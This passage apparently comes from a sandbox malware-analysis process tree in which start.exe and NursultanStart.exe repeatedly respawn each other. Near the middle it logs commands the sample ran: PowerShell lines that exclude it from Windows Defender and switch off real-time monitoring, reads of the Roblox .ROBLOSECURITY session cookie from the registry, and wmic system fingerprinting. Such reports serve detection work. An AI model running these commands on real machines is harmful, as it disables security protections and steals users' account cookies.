        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        93⤵
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        94⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        94⤵
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        95⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        95⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        96⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        96⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        97⤵
        
        PID:3480
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        97⤵
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        98⤵
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        98⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        99⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        99⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        100⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        100⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        101⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        101⤵
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        102⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        102⤵
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        103⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        103⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        104⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        104⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        105⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        105⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        106⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        106⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        107⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        107⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        108⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        108⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        109⤵
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        109⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        110⤵
        
        PID:208
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        110⤵
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        111⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        111⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        112⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        112⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        113⤵
        
        PID:3548
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        113⤵
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        114⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        114⤵
        
        PID:1920
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        115⤵
        
        PID:3404
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        115⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        116⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        116⤵
        
        PID:4088
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        117⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        117⤵
        
        PID:672
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        118⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        118⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        119⤵
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        119⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        120⤵
        
        PID:1332
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        120⤵
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        121⤵
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        121⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        122⤵
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        122⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        123⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        123⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        124⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        124⤵
        
        PID:3404
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        125⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        125⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        126⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        126⤵
        
        PID:4268
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        127⤵
        
        PID:672
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        127⤵
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        128⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        128⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        129⤵
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        129⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        130⤵
        
        PID:1056
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        130⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        131⤵
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        131⤵
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        132⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        132⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        133⤵
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        133⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        134⤵
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        134⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        135⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        135⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        136⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        136⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        137⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        137⤵
        
        PID:3620
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        138⤵
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        138⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        139⤵
        
        PID:3828
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        139⤵
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        140⤵
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        140⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        141⤵
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        141⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        142⤵
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        142⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        143⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        143⤵
        
        PID:1480
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        144⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        144⤵
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        145⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        145⤵
        
        PID:4252
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        146⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        146⤵
        
        PID:4268
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        147⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        147⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        148⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        148⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        149⤵
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        149⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        150⤵
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        150⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        151⤵
        Drops file in Drivers directory
        
        PID:4620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe'
        152⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        152⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        152⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        152⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4812
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        152⤵
        
        PID:5076
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        152⤵
        
        PID:1920
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        152⤵
        
        PID:1276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        152⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4924
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        153⤵
        
        PID:1500
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        152⤵
        Detects videocard installed
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        151⤵
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        152⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        152⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        153⤵
        
        PID:1480
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        153⤵
        
        PID:1208
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        154⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        154⤵
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        155⤵
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        155⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        156⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        156⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        157⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        157⤵
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        158⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        158⤵
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        159⤵
        
        PID:3404
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        159⤵
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        160⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        160⤵
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        161⤵
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        161⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        162⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        162⤵
        
        PID:412
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        163⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        163⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        164⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        164⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        165⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        165⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        166⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        166⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        167⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        167⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        168⤵
        
        PID:1232
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        168⤵
        
        PID:3104
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        169⤵
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        169⤵
        
        PID:4032
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        170⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        170⤵
        
        PID:3404
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        171⤵
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        171⤵
        
        PID:4648
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        172⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        172⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        173⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        173⤵
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        174⤵
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        174⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        175⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        175⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        176⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        176⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        177⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        177⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        178⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        178⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        179⤵
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        179⤵
        
        PID:3620
        
